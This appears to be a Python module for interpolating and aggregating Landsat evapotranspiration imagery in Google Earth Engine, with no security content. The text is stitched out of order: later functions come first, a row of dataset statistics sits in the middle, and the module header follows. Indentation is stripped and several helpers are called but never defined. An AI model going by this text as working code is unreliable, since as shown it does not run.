"""Interpolate from a precomputed collection of Landsat ET fraction scenes
Parameters
----------
scene_coll : ee.ImageCollection
Non-daily 'et_fraction' images that will be interpolated.
start_date : str
ISO format start date.
end_date : str
ISO format end date (exclusive, passed directly to .filterDate()).
variables : list
List of variables that will be returned in the Image Collection.
interp_args : dict
Parameters from the INTERPOLATE section of the INI file.
# TODO: Look into a better format for showing the options
interp_method : {'linear}, optional
Interpolation method. The default is 'linear'.
interp_days : int, str, optional
Number of extra days before the start date and after the end date
to include in the interpolation calculation. The default is 32.
model_args : dict
Parameters from the MODEL section of the INI file. The reference
source and parameters will need to be set here if computing
reference ET or actual ET.
t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
Time interval over which to interpolate and aggregate values
The default is 'custom' which means the aggregation time period
will be controlled by the start and end date parameters.
use_joins : bool, optional
If True, use joins to link the target and source collections.
If False, the source collection will be filtered for each target image.
This parameter is passed through to interpolate.daily().
Returns
-------
ee.ImageCollection
Raises
------
ValueError
Notes
-----
This function currently assumes that "mask" and "time" bands already exist
in the scene collection.
"""
# Get interp_method
if 'interp_method' in interp_args.keys():
interp_method = interp_args['interp_method']
else:
interp_method = 'linear'
logging.debug('interp_method was not set, default to "linear"')
# Get interp_days
if 'interp_days' in interp_args.keys():
interp_days = interp_args['interp_days']
else:
interp_days = 32
logging.debug('interp_days was not set, default to 32')
# Check that the input parameters are valid
if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
raise ValueError('unsupported t_interval: {}'.format(t_interval))
elif interp_method.lower() not in ['linear']:
raise ValueError('unsupported interp_method: {}'.format(
interp_method))
if ((type(interp_days) is str or type(interp_days) is float) and
utils.is_number(interp_days)):
interp_days = int(interp_days)
elif not type(interp_days) is int:
raise TypeError('interp_days must be an integer')
elif interp_days <= 0:
raise ValueError('interp_days must be a positive integer')
if not variables:
raise ValueError('variables parameter must be set')
# Adjust start/end dates based on t_interval
# Increase the date range to fully include the time interval
start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
if t_interval.lower() == 'annual':
start_dt = datetime.datetime(start_dt.year, 1, 1)
# Covert end date to inclusive, flatten to beginning of year,
# then add a year which will make it exclusive
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, 1, 1)
end_dt += relativedelta(years=+1)
elif t_interval.lower() == 'monthly':
start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
end_dt += relativedelta(months=+1)
start_date = start_dt.strftime('%Y-%m-%d')
end_date = end_dt.strftime('%Y-%m-%d')
# The start/end date for the interpolation include more days
# (+/- interp_days) than are included in the ETr collection
interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
interp_start_date = interp_start_dt.date().isoformat()
interp_end_date = interp_end_dt.date().isoformat()
# Get reference ET source
if 'et_reference_source' in model_args.keys():
et_reference_source = model_args['et_reference_source']
else:
raise ValueError('et_reference_source was not set')
# Get reference ET band name
if 'et_reference_band' in model_args.keys():
et_reference_band = model_args['et_reference_band']
else:
raise ValueError('et_reference_band was not set')
# Get reference ET factor
if 'et_reference_factor' in model_args.keys():
et_reference_factor = model_args['et_reference_factor']
else:
et_reference_factor = 1.0
logging.debug('et_reference_factor was not set, default to 1.0')
# raise ValueError('et_reference_factor was not set')
# CGM - Resampling is not working correctly so commenting out for now
# # Get reference ET resample
# if 'et_reference_resample' in model_args.keys():
# et_reference_resample = model_args['et_reference_resample']
# else:
# et_reference_resample = 'nearest'
# logging.debug(
# 'et_reference_resample was not set, default to nearest')
# # raise ValueError('et_reference_resample was not set')
if type(et_reference_source) is str:
# Assume a string source is an single image collection ID
# not an list of collection IDs or ee.ImageCollection
daily_et_ref_coll = ee.ImageCollection(et_reference_source) \
.filterDate(start_date, end_date) \
.select([et_reference_band], ['et_reference'])
# elif isinstance(et_reference_source, computedobject.ComputedObject):
# # Interpret computed objects as image collections
# daily_et_reference_coll = et_reference_source \
# .filterDate(self.start_date, self.end_date) \
# .select([et_reference_band])
else:
raise ValueError('unsupported et_reference_source: {}'.format(
et_reference_source))
# Scale reference ET images (if necessary)
# CGM - Resampling is not working correctly so not including for now
if (et_reference_factor and et_reference_factor != 1):
daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)
# Initialize variable list to only variables that can be interpolated
interp_vars = ['et_fraction', 'ndvi']
interp_vars = list(set(interp_vars) & set(variables))
# To return ET, the ETf must be interpolated
if 'et' in variables and 'et_fraction' not in interp_vars:
interp_vars.append('et_fraction')
# With the current interpolate.daily() function,
# something has to be interpolated in order to return et_reference
if 'et_reference' in variables and 'et_fraction' not in interp_vars:
interp_vars.append('et_fraction')
# The time band is always needed for interpolation
interp_vars.append('time')
# TODO: Look into implementing et_fraction clamping here
# (similar to et_actual below)
# Filter scene collection to the interpolation range
# This probably isn't needed since scene_coll was built to this range
scene_coll = scene_coll.filterDate(interp_start_date, interp_end_date)
# For count, compute the composite/mosaic image for the mask band only
if 'count' in variables:
aggregate_coll = aggregate_to_daily(
image_coll = scene_coll.select(['mask']),
start_date=start_date, end_date=end_date)
# The following is needed because the aggregate collection can be
# empty if there are no scenes in the target date range but there
# are scenes in the interpolation date range.
# Without this the count image will not be built but the other
# bands will be which causes a non-homogeneous image collection.
aggregate_coll = aggregate_coll.merge(
ee.Image.constant(0).rename(['mask'])
.set({'system:time_start': ee.Date(start_date).millis()}))
# Interpolate to a daily time step
daily_coll = daily(
target_coll=daily_et_ref_coll,
source_coll=scene_coll.select(interp_vars),
interp_method=interp_method, interp_days=interp_days,
use_joins=use_joins,
compute_product=False,
)
# The interpolate.daily() function can/will return the product of
# the source and target image named as "{source_band}_1".
# The problem with this approach is that is will drop any other bands
# that are being interpolated (such as the ndvi).
# daily_coll = daily_coll.select(['et_fraction_1'], ['et'])
# Compute ET from ETf and ETr (if necessary)
# This isn't needed if compute_product=True in daily() and band is renamed
# The check for et_fraction is needed since it is back computed from ET and ETr
# if 'et' in variables or 'et_fraction' in variables:
def compute_et(img):
"""This function assumes ETr and ETf are present"""
et_img = img.select(['et_fraction']) \
.multiply(img.select(['et_reference']))
return img.addBands(et_img.double().rename('et'))
daily_coll = daily_coll.map(compute_et)
def aggregate_image(agg_start_date, agg_end_date, date_format):
"""Aggregate the daily images within the target date range
Parameters
----------
agg_start_date: ee.Date, str
Start date (inclusive).
agg_end_date : ee.Date, str
End date (exclusive).
date_format : str
Date format for system:index (uses EE JODA format).
Returns
-------
ee.Image
Notes
-----
Since this function takes multiple inputs it is being called
for each time interval by separate mappable functions
"""
if 'et' in variables or 'et_fraction' in variables:
et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
.select(['et']).sum()
if 'et_reference' in variables or 'et_fraction' in variables:
# et_reference_img = daily_coll \
et_reference_img = daily_et_ref_coll \
.filterDate(agg_start_date, agg_end_date) \
.select(['et_reference']).sum()
image_list = []
if 'et' in variables:
image_list.append(et_img.float())
if 'et_reference' in variables:
image_list.append(et_reference_img.float())
if 'et_fraction' in variables:
# Compute average et fraction over the aggregation period
image_list.append(
et_img.divide(et_reference_img).rename(
['et_fraction']).float())
if 'ndvi' in variables:
# Compute average ndvi over the aggregation period
ndvi_img = daily_coll \
.filterDate(agg_start_date, agg_end_date) \
.mean().select(['ndvi']).float()
image_list.append(ndvi_img)
if 'count' in variables:
count_img = aggregate_coll \
.filterDate(agg_start_date, agg_end_date) \
.select(['mask']).sum().rename('count').uint8()
image_list.append(count_img)
return ee.Image(image_list) \
.set({
'system:index': ee.Date(agg_start_date).format(date_format),
'system:time_start': ee.Date(agg_start_date).millis()})
# .set(interp_properties) \
# Combine input, interpolated, and derived values
if t_interval.lower() == 'daily':
return ee.ImageCollection(daily_coll.map(agg_daily))
elif t_interval.lower() == 'monthly':
month_list = ee.List(list(month_gen(start_dt, end_dt)))
return ee.ImageCollection(month_list.map(agg_monthly))
elif t_interval.lower() == 'annual':
year_list = ee.List(list(year_gen(start_dt, end_dt)))
return ee.ImageCollection(year_list.map(agg_annual))
elif t_interval.lower() == 'custom':
# Returning an ImageCollection to be consistent
return ee.ImageCollection(aggregate_image(
agg_start_date=start_date, agg_end_date=end_date,
date_format='YYYYMMdd'))
def from_scene_et_actual(scene_coll, start_date, end_date, variables,
interp_args, model_args, t_interval='custom',
use_joins=False,
):
"""Interpolate from a precomputed collection of Landsat actual ET scenes
Parameters
----------
scene_coll : ee.ImageCollection
Non-daily 'et' images that will be interpolated.
start_date : str
ISO format start date.
end_date : str
ISO format end date (exclusive, passed directly to .filterDate()).
variables : list
List of variables that will be returned in the Image Collection.
interp_args : dict
Parameters from the INTERPOLATE section of the INI file.
# TODO: Look into a better format for showing the options
interp_source : str
interp_band : str
interp_resample : {'nearest', 'nearest'}
interp_method : {'linear}, optional
Interpolation method. The default is 'linear'.
interp_days : int, str, optional
Number of extra days before the start date and after the end date
to include in the interpolation calculation. The default is 32.
et_fraction_min : float
et_fraction_max : float
model_args : dict
Parameters from the MODEL section of the INI file. The reference
source and other parameters will need to be set here if computing
reference ET or ET fraction.
t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
Time interval over which to interpolate and aggregate values
The default is 'custom' which means the aggregation time period
will be controlled by the start and end date parameters.
use_joins : bool, optional
If True, use joins to link the target and source collections.
If False, the source collection will be filtered for each target image.
This parameter is passed through to interpolate.daily().
# TODO: Move these into interp_args (and/or model_args)
fraction_min : float, optional
fraction_max : float, optional
Returns
-------
ee.ImageCollection
Raises
------
ValueError
Notes
-----
This function currently assumes that "mask" and "time" bands already exist
in the scene collection.
"""
# Get interp_method
if 'interp_method' in interp_args.keys():
interp_method = interp_args['interp_method']
else:
interp_method = 'linear'
logging.debug('interp_method was not set, default to "linear"')
# Get interp_days
if 'interp_days' in interp_args.keys():
interp_days = interp_args['interp_days']
else:
interp_days = 32
logging.debug('interp_days was not set, default to 32')
# Check that the input parameters are valid
if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
raise ValueError('unsupported t_interval: {}'.format(t_interval))
elif interp_method.lower() not in ['linear']:
raise ValueError('unsupported interp_method: {}'.format(
interp_method))
if ((type(interp_days) is str or type(interp_days) is float) and
utils.is_number(interp_days)):
interp_days = int(interp_days)
elif not type(interp_days) is int:
raise TypeError('interp_days must be an integer')
elif interp_days <= 0:
raise ValueError('interp_days must be a positive integer')
if not variables:
raise ValueError('variables parameter must be set')
# Adjust start/end dates based on t_interval
# Increase the date range to fully include the time interval
start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
if t_interval.lower() == 'annual':
start_dt = datetime.datetime(start_dt.year, 1, 1)
# Covert end date to inclusive, flatten to beginning of year,
# then add a year which will make it exclusive
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, 1, 1)
end_dt += relativedelta(years=+1)
elif t_interval.lower() == 'monthly':
start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
end_dt -= relativedelta(days=+1)
end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
end_dt += relativedelta(months=+1)
start_date = start_dt.strftime('%Y-%m-%d')
end_date = end_dt.strftime('%Y-%m-%d')
# The start/end date for the interpolation include more days
# (+/- interp_days) than are included in the ETr collection
interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
interp_start_date = interp_start_dt.date().isoformat()
interp_end_date = interp_end_dt.date().isoformat()
# Get reference ET collection
if 'et_reference' in variables or 'et_fraction' in variables:
if 'et_reference_source' not in model_args.keys():
raise ValueError('et_reference_source was not set')
if 'et_reference_band' not in model_args.keys():
raise ValueError('et_reference_band was not set')
# TODO: Check if model_args can be modified instead of making new variables
if 'et_reference_factor' in model_args.keys():
et_reference_factor = model_args['et_reference_factor']
else:
et_reference_factor = 1.0
logging.debug('et_reference_factor was not set, default to 1.0')
# raise ValueError('et_reference_factor was not set')
# CGM - Resampling is not working correctly so commenting out for now
# if 'et_reference_resample' in model_args.keys():
# et_reference_resample = model_args['et_reference_resample']
# else:
# et_reference_resample = 'nearest'
# logging.debug(
# 'et_reference_resample was not set, default to nearest')
# # raise ValueError('et_reference_resample was not set')
# Assume a string source is an single image collection ID
# not an list of collection IDs or ee.ImageCollection
daily_et_ref_coll_id = model_args['et_reference_source']
daily_et_ref_coll = ee.ImageCollection(daily_et_ref_coll_id) \
.filterDate(start_date, end_date) \
.select([model_args['et_reference_band']], ['et_reference'])
# Scale reference ET images (if necessary)
# CGM - Resampling is not working correctly so not including for now
if (et_reference_factor and et_reference_factor != 1):
daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)
# TODO: Add code to fall back on the model_args reference ET parameters
# if the interp source/band/resample parameters are not set.
# Get the interpolation collection
if 'interp_source' not in interp_args.keys():
raise ValueError('interp_source was not set')
if 'interp_band' not in interp_args.keys():
raise ValueError('interp_band was not set')
# CGM - Resampling is not working correctly so commenting out for now
# if 'interp_resample' not in interp_args.keys():
# interp_args['interp_resample'] = 'nearest'
# logging.debug('interp_resample was not set, defaulting to nearest')
# # raise ValueError('interp_resample was not set')
# CGM - Factor is not currently being applied so commenting out for now
# if 'interp_factor' not in interp_args.keys():
# interp_args['interp_factor'] = 1.0
# logging.debug('interp_factor was not set, defaulting to 1.0')
# # raise ValueError('interp_factor was not set')
# Target collection needs to be filtered to the same date range as the
# scene collection in order to normalize the scenes.
# It will be filtered again to the start/end when it is sent into
# interpolate.daily()
daily_target_coll = ee.ImageCollection(interp_args['interp_source']) \
.filterDate(interp_start_date, interp_end_date) \
.select([interp_args['interp_band']])
interp_vars = ['et'] + ['mask', 'time']
# For count, compute the composite/mosaic image for the mask band only
if 'count' in variables:
aggregate_coll = aggregate_to_daily(
image_coll=scene_coll.select(['mask']),
start_date=start_date, end_date=end_date)
# The following is needed because the aggregate collection can be
# empty if there are no scenes in the target date range but there
# are scenes in the interpolation date range.
# Without this the count image will not be built but the other
# bands will be which causes a non-homogeneous image collection.
aggregate_coll = aggregate_coll.merge(
ee.Image.constant(0).rename(['mask'])
.set({'system:time_start': ee.Date(start_date).millis()}))
# It might be more efficient to join the target collection to the scenes
# The time band is always needed for interpolation
scene_coll = scene_coll \
.filterDate(interp_start_date, interp_end_date) \
.select(interp_vars) \
.map(normalize_et)
# # Join the target (normalization) image to the scene images
# if use_joins:
# prev_filter = ee.Filter.And(
# ee.Filter.maxDifference(
# difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
# leftField='system:time_start', rightField='system:time_start'),
# ee.Filter.greaterThan(leftField='system:time_start',
# rightField='system:time_start')
# )
# scene_coll = ee.ImageCollection(
# ee.Join.saveFirst(matchKey='norm_img', ordering='system:time_start',
# ascending=False)
# .apply(primary=scene_coll, secondary=target_coll,
# condition=prev_filter)
# )
# Interpolate to a daily time step
daily_coll = daily(
target_coll=daily_target_coll.filterDate(start_date, end_date),
source_coll=scene_coll.select(['et_norm', 'time']),
interp_method=interp_method, interp_days=interp_days,
use_joins=use_joins,
compute_product=True,
)
# The interpolate.daily() function is currently returning the product of
# the source and target image named as "{source_band}_1".
# This approach will not be valid if other bands are interpolated.
daily_coll = daily_coll.select(['et_norm_1'], ['et'])
# Convert normalized ET back to ET
# This isn't needed if compute_product=True in daily() and band is renamed
# The check for et_fraction is needed since it is back computed from ET and ETr
# # if 'et' in variables or 'et_fraction' in variables:
# def compute_et(img):
# """This function assumes ETr and ETf are present"""
# et_img = img.select(['et_norm']).multiply(
# img.select(['et_reference']))
# return img.addBands(et_img.double().rename('et'))
# daily_coll = daily_coll.map(compute_et)
def aggregate_image(agg_start_date, agg_end_date, date_format):
"""Aggregate the daily images within the target date range
Parameters
----------
agg_start_date: ee.Date, str
Start date (inclusive).
agg_end_date : ee.Date, str
End date (exclusive).
date_format : str
Date format for system:index (uses EE JODA format).
Returns
-------
ee.Image
Notes
-----
Since this function takes multiple inputs it is being called
for each time interval by separate mappable functions
"""
if 'et' in variables or 'et_fraction' in variables:
et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
.select(['et']).sum()
if 'et_reference' in variables or 'et_fraction' in variables:
# Get the reference ET image from the reference ET collection,
# not the interpolated collection
# et_reference_img = daily_coll.select(['et_reference']) \
et_reference_img = daily_et_ref_coll \
.filterDate(agg_start_date, agg_end_date) \
.sum()
image_list = []
if 'et' in variables:
image_list.append(et_img.float())
if 'et_reference' in variables:
image_list.append(et_reference_img.float())
if 'et_fraction' in variables:
# Compute average et fraction over the aggregation period
image_list.append(
et_img.divide(et_reference_img)
.rename(['et_fraction']).float())
# if 'ndvi' in variables:
# # Compute average ndvi over the aggregation period
# ndvi_img = daily_coll \
# .filterDate(agg_start_date, agg_end_date) \
# .mean().select(['ndvi']).float()
# image_list.append(ndvi_img)
if 'count' in variables:
count_img = aggregate_coll \
.filterDate(agg_start_date, agg_end_date) \
.select(['mask']).sum().rename('count').uint8()
image_list.append(count_img)
return ee.Image(image_list) \
.set({
'system:index': ee.Date(agg_start_date).format(date_format),
'system:time_start': ee.Date(agg_start_date).millis()})
# .set(interp_properties)\
# Combine input, interpolated, and derived values
if t_interval.lower() == 'daily':
return ee.ImageCollection(daily_coll.map(agg_daily))
elif t_interval.lower() == 'monthly':
month_list = ee.List(list(month_gen(start_dt, end_dt)))
return ee.ImageCollection(month_list.map(agg_monthly))
elif t_interval.lower() == 'annual':
year_list = ee.List(list(year_gen(start_dt, end_dt)))
return ee.ImageCollection(year_list.map(agg_annual))
elif t_interval.lower() == 'custom':
# Returning an ImageCollection to be consistent
return ee.ImageCollection(aggregate_image(
agg_start_date=start_date, agg_end_date=end_date,
date_format='YYYYMMdd'))
# @deprecated
# def aggregate_daily_with_joins(image_coll, start_date, end_date,
# agg_type='mean'):
# """Aggregate images by day (using joins)
#
# The primary purpose of this function is to join separate Landsat images
# from the same path into a single daily image.
#
# Parameters
# ----------
# image_coll : ee.ImageCollection
# Input image collection.
# start_date : date, number, string
# Start date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# end_date : date, number, string
# End date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# agg_type : {'mean'}, optional
# Aggregation type (the default is 'mean').
# Currently only a 'mean' aggregation type is supported.
#
# Returns
# -------
# ee.ImageCollection()
#
# Notes
# -----
# This function should be used to mosaic Landsat images from same path
# but different rows.
# system:time_start of returned images will be 0 UTC (not the image time).
#
# """
# # Build a collection of time "features" to join to
# # "Flatten" dates to 0 UTC time
# if start_date and end_date:
# date_list = ee.List.sequence(
# ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# 24 * 3600 * 1000)
# # elif start_date:
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # end_date = ee.Date.fromYMD(end_date.get('year'), end_date.get('month'),
# # # end_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), end_date.millis(), 24 * 3600 * 1000)
# # elif end_date:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # start_date = ee.Date.fromYMD(
# # # start_date.get('year'), start_date.get('month'),
# # # start_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # start_date.millis(), ee.Date(end_date).millis(), 24 * 3600 * 1000)
# # else:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# # 24 * 3600 * 1000)
#
# def set_date(time):
# return ee.Feature(None, {
# 'system:index': ee.Date(time).format('yyyyMMdd'),
# 'system:time_start': ee.Number(time).int64(),
# 'date': ee.Date(time).format('yyyy-MM-dd')})
#
# # Add a date property to the image collection
# def set_image_date(img):
# return ee.Image(img.set({
# 'date': ee.Date(img.get('system:time_start')).format('yyyy-MM-dd')}))
#
# join_coll = ee.FeatureCollection(
# ee.Join.saveAll('join').apply(
# ee.FeatureCollection(date_list.map(set_date)),
# ee.ImageCollection(image_coll.map(set_image_date)),
# ee.Filter.equals(leftField='date', rightField='date')))
#
# def aggregate_func(ftr):
# # The composite image time will be 0 UTC (not Landsat time)
# agg_coll = ee.ImageCollection.fromImages(ftr.get('join'))
#
# # if agg_type.lower() == 'mean':
# agg_img = agg_coll.mean()
# # elif agg_type.lower() == 'median':
# # agg_img = agg_coll.median()
#
# return agg_img.set({
# 'system:index': ftr.get('system:index'),
# 'system:time_start': ftr.get('system:time_start'),
# 'date': ftr.get('date'),
# })
#
# return ee.ImageCollection(join_coll.map(aggregate_func))
| 42.723037 | 87 | 0.625273 | import datetime
import logging
import ee
from dateutil.relativedelta import *
from . import utils
# import openet.core.utils as utils
def daily(target_coll, source_coll, interp_days=32, interp_method='linear',
use_joins=False, compute_product=False):
"""Interpolate non-daily source images to a daily target image collection
Parameters
----------
target_coll : ee.ImageCollection
Source images will be interpolated to each target image time_start.
Target images should have a daily time step. This will typically be
the reference ET (ETr) collection.
source_coll : ee.ImageCollection
Images that will be interpolated to the target image collection.
This will typically be the fraction of reference ET (ETrF) collection.
interp_days : int, optional
Number of days before and after each image date to include in the
interpolation (the default is 32).
interp_method : {'linear'}, optional
Interpolation method (the default is 'linear').
use_joins : bool, optional
If True, the source collection will be joined to the target collection
before mapping/interpolation and the source images will be extracted
from the join properties ('prev' and 'next').
Setting use_joins=True should be more memory efficient.
If False, the source images will be built by filtering the source
collection separately for each image in the target collection
(inside the mapped function).
compute_product : bool, optional
If True, compute the product of the target and all source image bands.
The default is False.
Returns
-------
ee.ImageCollection() of daily interpolated images
Raises
------
ValueError
If `interp_method` is not a supported method.
"""
prev_filter = ee.Filter.And(
ee.Filter.maxDifference(
difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
leftField='system:time_start',
rightField='system:time_start',
),
ee.Filter.greaterThan(
leftField='system:time_start',
rightField='system:time_start',
)
)
next_filter = ee.Filter.And(
ee.Filter.maxDifference(
difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
leftField='system:time_start',
rightField='system:time_start',
),
ee.Filter.lessThanOrEquals(
leftField='system:time_start',
rightField='system:time_start',
)
)
if use_joins:
# Join the neighboring Landsat images in time
target_coll = ee.ImageCollection(
ee.Join.saveAll(
matchesKey='prev',
ordering='system:time_start',
ascending=True,
outer=True,
).apply(
primary=target_coll,
secondary=source_coll,
condition=prev_filter,
)
)
target_coll = ee.ImageCollection(
ee.Join.saveAll(
matchesKey='next',
ordering='system:time_start',
ascending=False,
outer=True,
).apply(
primary=target_coll,
secondary=source_coll,
condition=next_filter,
)
)
# # DEADBEEF - This module is assuming that the time band is already in
# # the source collection.
# # Uncomment the following to add a time band here instead.
# def add_utc0_time_band(image):
# date_0utc = utils.date_0utc(ee.Date(image.get('system:time_start')))
# return image.addBands([
# image.select([0]).double().multiply(0).add(date_0utc.millis())\
# .rename(['time'])])
# source_coll = ee.ImageCollection(source_coll.map(add_utc0_time_band))
if interp_method.lower() == 'linear':
def _linear(image):
"""Linearly interpolate source images to target image time_start(s)
Parameters
----------
image : ee.Image.
The first band in the image will be used as the "target" image
and will be returned with the output image.
Returns
-------
ee.Image of interpolated values with band name 'src'
Notes
-----
The source collection images must have a time band.
This function is intended to be mapped over an image collection and
can only take one input parameter.
"""
# target_img = ee.Image(image).select(0).double()
target_date = ee.Date(image.get('system:time_start'))
# All filtering will be done based on 0 UTC dates
utc0_date = utils.date_0utc(target_date)
# utc0_time = target_date.update(hour=0, minute=0, second=0)\
# .millis().divide(1000).floor().multiply(1000)
time_img = ee.Image.constant(utc0_date.millis()).double()
# Build nodata images/masks that can be placed at the front/back of
# of the qm image collections in case the collections are empty.
bands = source_coll.first().bandNames()
prev_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
.double().rename(bands).updateMask(0)\
.set({
'system:time_start': utc0_date.advance(
-interp_days - 1, 'day').millis()})
next_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
.double().rename(bands).updateMask(0)\
.set({
'system:time_start': utc0_date.advance(
interp_days + 2, 'day').millis()})
if use_joins:
# Build separate mosaics for before and after the target date
prev_qm_img = ee.ImageCollection\
.fromImages(ee.List(ee.Image(image).get('prev')))\
.merge(ee.ImageCollection(prev_qm_mask))\
.sort('system:time_start', True)\
.mosaic()
next_qm_img = ee.ImageCollection\
.fromImages(ee.List(ee.Image(image).get('next')))\
.merge(ee.ImageCollection(next_qm_mask))\
.sort('system:time_start', False)\
.mosaic()
else:
# Build separate collections for before and after the target date
prev_qm_coll = source_coll\
.filterDate(utc0_date.advance(-interp_days, 'day'), utc0_date)\
.merge(ee.ImageCollection(prev_qm_mask))
next_qm_coll = source_coll\
.filterDate(utc0_date, utc0_date.advance(interp_days + 1, 'day'))\
.merge(ee.ImageCollection(next_qm_mask))
# Flatten the previous/next collections to single images
# The closest image in time should be on "top"
# CGM - Is the previous collection already sorted?
# prev_qm_img = prev_qm_coll.mosaic()
prev_qm_img = prev_qm_coll.sort('system:time_start', True)\
.mosaic()
next_qm_img = next_qm_coll.sort('system:time_start', False)\
.mosaic()
# DEADBEEF - It might be easier to interpolate all bands instead of
# separating the value and time bands
# prev_value_img = ee.Image(prev_qm_img).double()
# next_value_img = ee.Image(next_qm_img).double()
# Interpolate all bands except the "time" band
prev_bands = prev_qm_img.bandNames()\
.filter(ee.Filter.notEquals('item', 'time'))
next_bands = next_qm_img.bandNames()\
.filter(ee.Filter.notEquals('item', 'time'))
prev_value_img = ee.Image(prev_qm_img.select(prev_bands)).double()
next_value_img = ee.Image(next_qm_img.select(next_bands)).double()
prev_time_img = ee.Image(prev_qm_img.select('time')).double()
next_time_img = ee.Image(next_qm_img.select('time')).double()
# Fill masked values with values from the opposite image
# Something like this is needed to ensure there are always two
# values to interpolate between
# For data gaps, this will cause a flat line instead of a ramp
prev_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
next_time_img, prev_time_img]).mosaic())
next_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
prev_time_img, next_time_img]).mosaic())
prev_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
next_value_img, prev_value_img]).mosaic())
next_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
prev_value_img, next_value_img]).mosaic())
# Calculate time ratio of the current image between other cloud free images
time_ratio_img = time_img.subtract(prev_time_mosaic)\
.divide(next_time_mosaic.subtract(prev_time_mosaic))
# Interpolate values to the current image time
interp_img = next_value_mosaic.subtract(prev_value_mosaic)\
.multiply(time_ratio_img).add(prev_value_mosaic)
# Pass the target image back out as a new band
target_img = image.select([0]).double()
output_img = interp_img.addBands([target_img])\
# TODO: Come up with a dynamic way to name the "product" bands
# The product bands will have a "_1" appended to the name
# i.e. "et_fraction" -> "et_fraction_1"
if compute_product:
output_img = output_img\
.addBands([interp_img.multiply(target_img)])
return output_img.set({
'system:index': image.get('system:index'),
'system:time_start': image.get('system:time_start'),
# 'system:time_start': utc0_time,
})
interp_coll = ee.ImageCollection(target_coll.map(_linear))
# elif interp_method.lower() == 'nearest':
# interp_coll = ee.ImageCollection(target_coll.map(_nearest))
else:
raise ValueError('invalid interpolation method: {}'.format(interp_method))
return interp_coll
# @deprecated
def aggregate_daily(image_coll, start_date=None, end_date=None,
agg_type='mean'):
return aggregate_to_daily(image_coll, start_date, end_date, agg_type)
def aggregate_to_daily(image_coll, start_date=None, end_date=None,
agg_type='mean'):
"""Aggregate images by day without using joins
The primary purpose of this function is to join separate Landsat images
from the same path into a single daily image.
Parameters
----------
image_coll : ee.ImageCollection
Input image collection.
start_date : date, number, string, optional
Start date.
Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
end_date : date, number, string, optional
Exclusive end date.
Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
agg_type : {'mean'}, optional
Aggregation type (the default is 'mean').
Currently only a 'mean' aggregation type is supported.
Returns
-------
ee.ImageCollection()
Notes
-----
This function should be used to mosaic Landsat images from same path
but different rows.
system:time_start of returned images will be 0 UTC (not the image time).
"""
if start_date and end_date:
test_coll = image_coll.filterDate(ee.Date(start_date), ee.Date(end_date))
elif start_date:
test_coll = image_coll.filter(ee.Filter.greaterThanOrEquals(
'system:time_start', ee.Date(start_date).millis()))
elif end_date:
test_coll = image_coll.filter(ee.Filter.lessThan(
'system:time_start', ee.Date(end_date).millis()))
else:
test_coll = image_coll
# Build a sorted list of the unique "dates" in the image_coll
date_list = ee.List(test_coll.aggregate_array('system:time_start'))\
.map(lambda time: ee.Date(ee.Number(time)).format('yyyy-MM-dd'))\
.distinct().sort()
def aggregate_func(date_str):
start_date = ee.Date(ee.String(date_str))
end_date = start_date.advance(1, 'day')
agg_coll = image_coll.filterDate(start_date, end_date)
if agg_type.lower() == 'mean':
agg_img = agg_coll.mean()
# elif agg_type.lower() == 'median':
# agg_img = agg_coll.median()
else:
raise ValueError(f'unsupported agg_type "{agg_type}"')
return agg_img.set({
'system:index': start_date.format('yyyyMMdd'),
'system:time_start': start_date.millis(),
'date': start_date.format('yyyy-MM-dd'),
})
return ee.ImageCollection(date_list.map(aggregate_func))
def from_scene_et_fraction(scene_coll, start_date, end_date, variables,
interp_args, model_args, t_interval='custom',
use_joins=False,
):
"""Interpolate from a precomputed collection of Landsat ET fraction scenes
Parameters
----------
scene_coll : ee.ImageCollection
Non-daily 'et_fraction' images that will be interpolated.
